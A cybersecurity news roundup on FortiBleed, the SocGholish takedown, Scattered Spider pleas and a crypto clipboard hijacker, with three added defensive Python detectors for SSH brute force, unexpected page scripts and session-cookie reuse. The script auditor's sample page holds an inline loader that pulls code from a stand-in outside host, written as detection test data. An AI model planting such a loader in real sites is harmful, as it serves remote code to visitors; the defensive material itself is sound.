Three major cybersecurity developments converged in the week of June 23, 2026: a credential-harvesting campaign targeting over 430,000 FortiGate firewalls, a law enforcement takedown of the SocGholish malware network, and guilty pleas from two Scattered Spider members whose group extorted at least $115 million from victims. Together, they illustrate the current scale and coordination of financially motivated cybercrime.
FortiBleed Campaign Hits 430,000 Firewalls Worldwide
A Russian initial access broker has compromised more than 430,000 FortiGate firewalls globally since at least February 2026, harvesting an estimated 110 million credentials in a campaign researchers at SOCRadar have named FortiBleed. Of the 80,000 identified targets, more than 19,000 remain actively monitored by the attackers as of this week, according to SOCRadar’s white paper published June 23.
The attackers use Masscan and Shodan to identify exposed FortiGate appliances, then break in via SSH brute-force attacks. Once inside, they deploy a custom Golang tool called FortigateSniffer, which turns the firewalls into passive credential collectors — capturing cleartext credentials and password hashes from authentication traffic passing through the device. SOCRadar told SecurityWeek that attackers then “crack what they capture, and sell that access on.”
SOCRadar’s investigation identified hundreds of servers and more than 650 credential-harvesting pipelines operating as part of the campaign. High-value confirmed targets include a NATO-aligned defense contractor. The threat is compounded by supply-chain exposure: as Dark Reading reported, managed service providers that administer Fortinet devices on behalf of clients are squarely in scope, meaning a single compromised MSP can expose dozens of downstream organizations.
Tooling comments written in the Cyrillic alphabet led SOCRadar to assess the perpetrators are likely Russian, and the group’s behavior — compromising, harvesting, and reselling access — fits the profile of a financially motivated IAB rather than a state-sponsored actor.
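The entry point described above is plain SSH password guessing against the management interface, which is something a defender can see in authentication logs long before a sniffer is deployed. The following is an added example (not SOCRadar's tooling or any Fortinet-provided detection): it runs a sliding-window brute-force detector over a few constructed syslog-style lines and, more importantly, flags the pattern that matters most here, a successful login from a source that has just crossed the failure threshold. The log format, host names and addresses are all constructed for the example; map the regular expression onto your own firewall's authentication log schema.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta, timezone

# Constructed sample log lines in a generic syslog style. The format is
# hypothetical (it is not Fortinet's real log schema); only the detection
# logic is the point of the example.
SAMPLE_LOGS = """\
2026-02-14T03:12:01Z fw-edge-01 sshd: Failed password for admin from 198.51.100.7
2026-02-14T03:12:02Z fw-edge-01 sshd: Failed password for admin from 198.51.100.7
2026-02-14T03:12:03Z fw-edge-01 sshd: Failed password for admin from 198.51.100.7
2026-02-14T03:12:04Z fw-edge-01 sshd: Failed password for root from 198.51.100.7
2026-02-14T03:12:05Z fw-edge-01 sshd: Failed password for admin from 198.51.100.7
2026-02-14T03:12:09Z fw-edge-01 sshd: Accepted password for admin from 198.51.100.7
2026-02-14T03:15:00Z fw-edge-01 sshd: Accepted password for netops from 10.0.0.5
2026-02-14T04:40:00Z fw-edge-02 sshd: Failed password for admin from 203.0.113.9
2026-02-14T05:10:00Z fw-edge-02 sshd: Failed password for admin from 203.0.113.9
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) (?P<host>\S+) sshd: (?P<result>Failed|Accepted) password "
    r"for (?P<user>\S+) from (?P<ip>\S+)$"
)


def parse_events(text):
    """Turn raw lines into dicts with a parsed UTC timestamp; unmatched lines are skipped."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)
        events.append({"ts": ts, "host": m["host"], "ip": m["ip"],
                       "user": m["user"], "ok": m["result"] == "Accepted"})
    return sorted(events, key=lambda e: e["ts"])


def detect_ssh_bruteforce(events, threshold=5, window=timedelta(minutes=5)):
    """Sliding window of failures per (host, source IP).

    Returns two lists:
      bruteforce    -> (host, ip, failure_count) once failures inside `window` reach `threshold`
      success_after -> (host, ip, user) for a login accepted while the source is over threshold
    The second list is the one worth paging on: it is the signature of a guessed password.
    """
    recent = defaultdict(deque)   # (host, ip) -> timestamps of failures still inside the window
    flagged = {}                  # (host, ip) -> peak failure count observed in a window
    success_after = []
    for e in events:
        key = (e["host"], e["ip"])
        q = recent[key]
        while q and e["ts"] - q[0] > window:   # expire failures that fell out of the window
            q.popleft()
        if e["ok"]:
            if len(q) >= threshold:
                success_after.append((e["host"], e["ip"], e["user"]))
            continue
        q.append(e["ts"])
        if len(q) >= threshold:
            flagged[key] = max(flagged.get(key, 0), len(q))
    bruteforce = [(h, ip, n) for (h, ip), n in sorted(flagged.items())]
    return bruteforce, success_after


if __name__ == "__main__":
    bf, sa = detect_ssh_bruteforce(parse_events(SAMPLE_LOGS))
    for h, ip, n in bf:
        print(f"brute-force: {n} failures from {ip} against {h}")
    for h, ip, u in sa:
        print(f"ALERT: {ip} logged in as {u} on {h} after crossing the failure threshold")
```

With the constructed input, the first source trips the threshold and then logs in as `admin` four seconds later, so it appears in both lists; the second source makes two attempts half an hour apart and never reaches the window threshold. The same two-stage logic (threshold, then success-after-threshold) is what turns a noisy brute-force alert into an incident-worthy one.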
SocGholish Servers Seized in Operation Endgame
An international law enforcement operation seized 106 servers and numerous domains tied to SocGholish on June 18, 2026, as part of the ongoing Operation Endgame. Authorities also remediated 14,971 compromised websites, the majority hosted on WordPress, that SocGholish operators had used to distribute the malware, according to the Netherlands’ National Police Corps.
SocGholish is a JavaScript-based malware framework that has operated for nearly a decade. It injects malicious code into legitimate websites, presenting visitors with fake browser update prompts. When users install the fake update, the malware establishes a foothold that threat actors then use to deploy ransomware or conduct espionage — most notably on behalf of the Russian cybercrime group Evil Corp.
The operation also drew attention to traffic distribution systems (TDSs), a less-discussed component of the infection chain. TDSs act as routing layers that filter incoming web traffic and redirect only high-value targets — typically corporate users on Windows machines — toward the malicious payload, while sending everyone else to benign content. The FBI Cyber Division said in a post on X on June 18 that the malware “establishes an initial foothold into victim computers, collectively known as a botnet, and is then used by threat actors for further targeting with ransomware campaigns and espionage.”
In an accompanying public service announcement, the FBI warned enterprises to scrutinize unexpected browser update prompts and audit third-party JavaScript loaded by their web properties.
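The FBI's advice to audit third-party JavaScript is straightforward to operationalize: enumerate every `<script>` a page loads and compare the hosts against what the site owner actually expects. The following is an added example, not FBI or law-enforcement tooling and not part of the original article. It parses a constructed HTML page, separates first-party scripts from allow-listed and unexpected third-party ones, and also catches the inline pattern an injected loader typically uses, creating a `script` element at runtime that points at an outside host. The site host, allow list, page contents and all domains in it are constructed for the example.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed page: the site's own bundle, an approved analytics tag, one
# unexpected external loader, and an inline snippet that pulls yet another
# script at runtime. All hosts here are made up for the example.
SAMPLE_HTML = """<html><head>
<script src="/static/app.js"></script>
<script src="https://cdn.example-analytics.com/tag.js"></script>
<script src="https://updates-check.example.net/loader.js" async></script>
<script>var s=document.createElement('script');s.src='https://x.example.org/u.js';document.head.appendChild(s);</script>
</head><body><p>hello</p></body></html>"""

SITE_HOST = "www.example.com"                    # assumed first-party host
ALLOWED_HOSTS = {"cdn.example-analytics.com"}    # assumed approved third parties

URL_RE = re.compile(r"https?://[^'\"\s)]+")
LOADER_RE = re.compile(r"createElement\(\s*['\"]script['\"]\s*\)")


class ScriptCollector(HTMLParser):
    """Collects external script URLs and the bodies of inline scripts."""

    def __init__(self):
        super().__init__()
        self.srcs = []
        self.inline = []
        self._in_inline_script = False

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.srcs.append(src)
        else:
            self._in_inline_script = True

    def handle_data(self, data):
        if self._in_inline_script and data.strip():
            self.inline.append(data.strip())

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_inline_script = False


def audit_scripts(html, site_host=SITE_HOST, allowed_hosts=ALLOWED_HOSTS):
    """Classify every script the page loads.

    Returns a dict with four lists:
      first_party     relative or same-host script URLs
      allowed         third-party URLs whose host is on the allow list
      unexpected      third-party URLs whose host is not on the allow list
      dynamic_loaders external hosts referenced by inline code that creates script elements
    """
    collector = ScriptCollector()
    collector.feed(html)
    result = {"first_party": [], "allowed": [], "unexpected": [], "dynamic_loaders": []}
    for src in collector.srcs:
        host = urlparse(src).netloc.lower()
        if not host or host == site_host:
            result["first_party"].append(src)
        elif host in allowed_hosts:
            result["allowed"].append(src)
        else:
            result["unexpected"].append(src)
    for code in collector.inline:
        if not LOADER_RE.search(code):
            continue
        for url in URL_RE.findall(code):
            host = urlparse(url).netloc.lower()
            if host and host != site_host and host not in allowed_hosts:
                result["dynamic_loaders"].append(host)
    return result


if __name__ == "__main__":
    for category, items in audit_scripts(SAMPLE_HTML).items():
        print(f"{category}: {items}")
```

Run against a real property, the `unexpected` and `dynamic_loaders` lists are the review queue: anything there that nobody can account for is either a forgotten integration or an injection. The inline check is deliberately simple; obfuscated loaders will not match `createElement('script')`, so treat any inline script that the site's own build did not emit as suspect regardless of what the regex finds.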
Scattered Spider Members Plead Guilty on Trial Day One
Two UK nationals pleaded guilty on June 23, 2026 — the first day of what had been scheduled as a six-week trial — to charges stemming from an August 2024 cyberattack that knocked out systems at Transport for London. The pair, Thalha Jubair, 20, of East London, and Owen Flowers, 18, of Walsall, are members of Scattered Spider, a loosely organized English-speaking cybercrime group that has targeted major enterprises across the US and UK.
Both admitted conspiring to commit unauthorized acts against Transport for London computer systems and causing risk of serious damage to human welfare. According to a BBC report cited by Krebs on Security, Flowers separately admitted involvement in hacking US healthcare providers SSM Health Care Corporation and Sutter Health in September 2024.
Jubair faces additional exposure in the United States. A September 2025 indictment unsealed by New Jersey prosecutors alleges he and other Scattered Spider members carried out 120 network intrusions targeting 47 US entities between May 2022 and September 2025, with victims paying a combined $115 million in ransom.
Crypto Heist Uses GitHub and YouTube as Distribution Channels
Check Point Software disclosed a separate campaign this week in which attackers built a fake reputation network — spanning GitHub repositories, SourceForge projects, and bogus YouTube videos — to distribute a Rust-based clipboard hijacker targeting cryptocurrency holders on both Windows and macOS. The campaign was reported by Dark Reading on June 22.
The malware silently replaces cryptocurrency wallet addresses copied to the clipboard with attacker-controlled addresses, redirecting transactions without the victim’s knowledge. Check Point described the primary targets as “users who are looking for shortcuts and quick profits — particularly crypto owners and online crash-game gamblers and traders who are attracted by promises of automated gains.”
The campaign is notable less for its payload than for its distribution model: rather than relying on phishing emails or exploit kits, the attackers built a superficially credible ecosystem of open-source tools and tutorial content to pass off the malware as legitimate software.
What This Means
This week’s disclosures share a common thread: attackers are operating at infrastructure scale. FortiBleed’s 650 harvesting pipelines and SocGholish’s 14,971 compromised websites are not opportunistic — they reflect sustained, industrialized operations built to generate sellable access. The Scattered Spider guilty pleas confirm that even loosely organized groups with teenage members can sustain multi-year, nine-figure extortion campaigns.
For security teams, the FortiBleed campaign is the most operationally urgent. Any organization running internet-exposed FortiGate appliances — or using an MSP that does — should treat credential stores as potentially compromised and audit for unauthorized Active Directory changes and session cookie reuse. The SocGholish takedown removes one active threat but does not eliminate the TDS model; similar frameworks will fill the gap.
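"Session cookie reuse" is the concrete thing to look for once captured credentials and tokens are assumed to be in an attacker's hands: the same session identifier being presented from a second network location or a different client shortly after the legitimate user's activity. The following is an added example, not from the article or any vendor: it groups constructed web-application access events by session ID and flags sessions whose source IP changes within a short window, or whose User-Agent changes at all. The event schema, session IDs, addresses and user agents are all constructed.

```python
from collections import defaultdict
from datetime import datetime, timedelta, timezone

# Constructed access events (hypothetical JSON-like schema, not from any real product).
# s1: legitimate use, then the same cookie appears from another address with a
#     different client three minutes later.
# s2: one address, one client throughout.
# s3: address changes, but hours apart and with the same client (e.g. a laptop
#     moving between networks), which this rule deliberately does not flag.
SAMPLE_EVENTS = [
    {"ts": "2026-06-20T08:00:00Z", "sid": "s1", "ip": "10.0.0.12", "ua": "Chrome/125 (Windows)"},
    {"ts": "2026-06-20T08:01:00Z", "sid": "s1", "ip": "10.0.0.12", "ua": "Chrome/125 (Windows)"},
    {"ts": "2026-06-20T08:03:00Z", "sid": "s1", "ip": "198.51.100.7", "ua": "curl/8.5"},
    {"ts": "2026-06-20T08:00:00Z", "sid": "s2", "ip": "10.0.0.30", "ua": "Chrome/125 (Windows)"},
    {"ts": "2026-06-20T08:20:00Z", "sid": "s2", "ip": "10.0.0.30", "ua": "Chrome/125 (Windows)"},
    {"ts": "2026-06-20T07:00:00Z", "sid": "s3", "ip": "10.0.0.44", "ua": "Safari/17 (macOS)"},
    {"ts": "2026-06-20T16:30:00Z", "sid": "s3", "ip": "172.16.5.9", "ua": "Safari/17 (macOS)"},
]


def _parse_ts(s):
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)


def detect_session_reuse(events, window=timedelta(minutes=10)):
    """Flag sessions that look like a replayed cookie.

    Rules (applied to consecutive events of the same session, in time order):
      ip_switch_within_window  source IP changes and the two events are <= `window` apart
      user_agent_change        the client string changes at any point in the session
    Returns a list of findings sorted by session id; each finding lists the
    reasons and the distinct IPs and user agents seen for that session.
    """
    by_sid = defaultdict(list)
    for e in events:
        by_sid[e["sid"]].append({**e, "ts": _parse_ts(e["ts"])})
    findings = []
    for sid, evs in by_sid.items():
        evs.sort(key=lambda e: e["ts"])
        reasons = set()
        for prev, cur in zip(evs, evs[1:]):
            if cur["ip"] != prev["ip"] and cur["ts"] - prev["ts"] <= window:
                reasons.add("ip_switch_within_window")
            if cur["ua"] != prev["ua"]:
                reasons.add("user_agent_change")
        if reasons:
            findings.append({
                "sid": sid,
                "reasons": sorted(reasons),
                "ips": sorted({e["ip"] for e in evs}),
                "uas": sorted({e["ua"] for e in evs}),
            })
    return sorted(findings, key=lambda f: f["sid"])


if __name__ == "__main__":
    for f in detect_session_reuse(SAMPLE_EVENTS):
        print(f"session {f['sid']}: {', '.join(f['reasons'])}; ips={f['ips']}; uas={f['uas']}")
```

The window is the tuning knob: tighten it where users are on fixed corporate networks, loosen it for mobile-heavy populations. A user-agent change inside one session is rarely legitimate and is the stronger signal of the two, which is why the rule fires on it regardless of timing. Pair the output with the credential-reset work, since a replayed session survives a password change unless the session itself is revoked.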
FAQ
What is FortiBleed and who is at risk?
FortiBleed is a credential-harvesting campaign targeting internet-exposed FortiGate firewalls, active since at least February 2026. Organizations running FortiGate devices directly or through managed service providers are at risk, as are their downstream clients and supply-chain partners.
What is SocGholish and how does it infect users?
SocGholish is a JavaScript malware framework that compromises legitimate websites and displays fake browser update prompts to visitors. Users who install the fake update unknowingly give attackers a foothold that is then sold to ransomware groups, most notably Evil Corp.
Who are Scattered Spider and what did they plead guilty to?
Scattered Spider is an English-speaking cybercrime group responsible for attacks on major enterprises in the US and UK. Thalha Jubair and Owen Flowers pleaded guilty on June 23, 2026 to charges related to the August 2024 attack on Transport for London; Jubair also faces a US indictment tied to 120 intrusions and $115 million in ransom payments.
Sources
- SocGholish Takedown Highlights Malicious TDS Threats – Dark Reading
- FortiBleed Attackers Turn Firewalls Into Credential Stealers as Heists Persist – Dark Reading
- Russian Initial Access Broker Behind FortiBleed Campaign – SecurityWeek
- Scattered Spider Hackers Plead Guilty on Day 1 of Trial – Krebs on Security
- Crypto Heist Fueled by Elaborate Fake Reputation-Boosting Campaign – Dark Reading